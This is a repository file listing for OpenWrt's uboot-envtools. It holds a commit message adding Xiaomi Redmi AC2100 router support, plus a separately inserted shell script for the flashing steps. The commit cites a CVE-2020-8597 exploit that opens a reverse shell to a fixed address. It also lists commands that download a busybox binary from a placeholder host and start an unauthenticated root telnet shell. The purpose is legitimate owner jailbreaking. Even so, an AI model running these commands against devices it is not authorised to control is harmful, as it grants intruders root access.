openwrt/package/boot/uboot-envtools/files
Richard Huynh f3792690c4 ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100)
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot

Installation:

1. Run the linked exploit to get a shell, start up telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0

Restore to stock:

1. Set up a PXE and TFTP server serving the stock firmware image
(See the dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white

Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.); thus we use the second slot and overwrite the first
rootfs onwards in order to get more space.

Exploit and detailed instructions:

https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100

An implementation of CVE-2020-8597 against stock firmware version 1.0.14

This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.

As this shell is somewhat unreliable and likely to be killed after a random amount
of time, it is recommended to wget a statically compiled busybox binary onto the
device and start telnetd with it.

The stock telnetd and dropbear unfortunately appear inoperable.
(Likely disabled on release versions of the stock firmware.)
I.e.:
    wget https://yourip/busybox-mipsel -O /tmp/busybox
    chmod a+x /tmp/busybox
    /tmp/busybox telnetd -l /bin/sh

Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
2020-05-20 15:26:22 +02:00
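The installation steps 2-7 above are a fixed sequence typed into a shell that the commit itself describes as unreliable, and the images arrive over that shell with no integrity check beyond wget succeeding. The script below is an added example, not part of the OpenWrt commit or of the project's own scripts: it wraps the same steps in a function that first checks that both images exist and match sha256 digests given on the command line (compute those on the host that built or downloaded the images; the script knows no digests), then checks that the stock mtd table actually exposes kernel1 and rootfs0 before anything is written. The image paths, the mtd table path and the availability of sha256sum on the stock busybox are assumptions; DRY_RUN=1 prints the commands instead of running them.

```shell
#!/bin/sh
# Added example, not the OpenWrt project's code: installation steps 2-7 from
# the RM2100 commit message, guarded by image digest and partition checks.
# Usage on the device: sh rm2100-install.sh <kernel1 sha256> <rootfs0 sha256>
# Paths below are assumptions and can be overridden in the environment.
KERNEL_IMG="${KERNEL_IMG:-/tmp/openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin}"
ROOTFS_IMG="${ROOTFS_IMG:-/tmp/openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin}"
MTD_TABLE="${MTD_TABLE:-/proc/mtd}"

# run CMD...: execute the command, or only print it when DRY_RUN=1.
run() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        echo "DRY: $*"
    else
        "$@"
    fi
}

# digest FILE: hex sha256 of FILE. sha256sum is assumed on busybox/coreutils;
# shasum is the fallback for hosts that only ship perl's shasum.
digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# verify_image FILE EXPECTED: 0 when FILE exists and its sha256 is EXPECTED.
verify_image() {
    if [ ! -f "$1" ]; then
        echo "missing image: $1" >&2
        return 1
    fi
    if [ "$(digest "$1")" != "$2" ]; then
        echo "sha256 mismatch for $1, refusing to flash" >&2
        return 1
    fi
    return 0
}

# partition_present NAME: 0 when the mtd table lists a partition called NAME
# (lines look like: mtd5: 00400000 00020000 "kernel1").
partition_present() {
    grep -q "\"$1\"" "$MTD_TABLE"
}

# install_openwrt KERNEL_SHA256 ROOTFS_SHA256: the commit's steps 2-7, in order.
install_openwrt() {
    verify_image "$KERNEL_IMG" "$1" || return 1
    verify_image "$ROOTFS_IMG" "$2" || return 1
    if ! partition_present kernel1 || ! partition_present rootfs0; then
        echo "kernel1/rootfs0 not listed in $MTD_TABLE, not flashing" >&2
        return 1
    fi
    # Step 2: kernel into the second kernel slot. The running system still
    # boots from the first slot, so a failure here leaves stock intact.
    run mtd write "$KERNEL_IMG" kernel1
    # Steps 3-6: u-boot variables, committed together. flag_try_sys1_failed=1
    # selects the second slot that the commit's note on dual slots describes.
    run nvram set uart_en=1
    run nvram set bootdelay=5
    run nvram set flag_try_sys1_failed=1
    run nvram commit
    # Step 7, last: the rootfs written from rootfs0 onwards, with -r so the
    # device reboots only once everything above is in place.
    run mtd -r write "$ROOTFS_IMG" rootfs0
}

# Flash only when invoked with both digests; sourcing just defines functions.
if [ $# -eq 2 ]; then
    install_openwrt "$1" "$2"
fi
```

Preview the exact command sequence with `DRY_RUN=1 sh rm2100-install.sh <kernel sha256> <rootfs sha256>` before running it for real; the ordering keeps the reboot (`mtd -r`) as the final step so that a dropped reverse shell mid-way never leaves the nvram flags pointing at a slot with a half-written image.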
apm821xx apm821xx: add support for the Netgear WNDAP620 and WNDAP660 2018-11-26 12:05:46 +01:00
ar71xx uboot-envtools: ar71xx: add support for gl-ar150/-domino/-mifi 2020-01-23 14:04:50 +01:00
ath79 uboot-envtools: fix domywifi_dw33d Bad CRC error 2020-04-26 21:45:30 +02:00
cns3xxx treewide: use the generic board_name function 2017-07-15 23:13:34 +02:00
imx6 uboot-envtools: remove erasesize from MMC config 2019-10-21 12:28:03 +02:00
ipq40xx ipq40xx: Add support for Linksys EA8300 (Dallas) 2019-05-18 13:43:54 +02:00
ipq806x uboot-envtools: adds r7800 uboot env support 2018-10-07 02:12:06 +02:00
kirkwood kirkwood: add support for Iomega Storcenter ix2-200 2018-07-30 15:21:00 +02:00
lantiq lantiq: use the compatible string as board name 2017-12-16 23:33:56 +01:00
layerscape uboot-envtools: add configuration for Traverse LS1043 boards. 2018-07-30 10:53:57 +02:00
mpc85xx mpc85xx: add support for OCEDO Panda 2019-01-26 17:10:19 +01:00
mvebu mvebu: tidy up support for GL.iNet GL-MV1000 2020-04-27 00:25:12 +02:00
mxs uboot-envtools: mxs: add support for olimex, imx23-olinuxino 2020-03-08 15:10:55 +01:00
oxnas uboot-envtools: fix fw_env.config for ox820/stg-212 2019-04-11 19:21:55 +02:00
pistachio pistachio: remove custom board detection override 2017-03-22 11:43:22 +01:00
ramips ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100) 2020-05-20 15:26:22 +02:00
uboot-envtools.sh uboot-envtools: check for config prior to append 2019-12-17 19:35:16 +02:00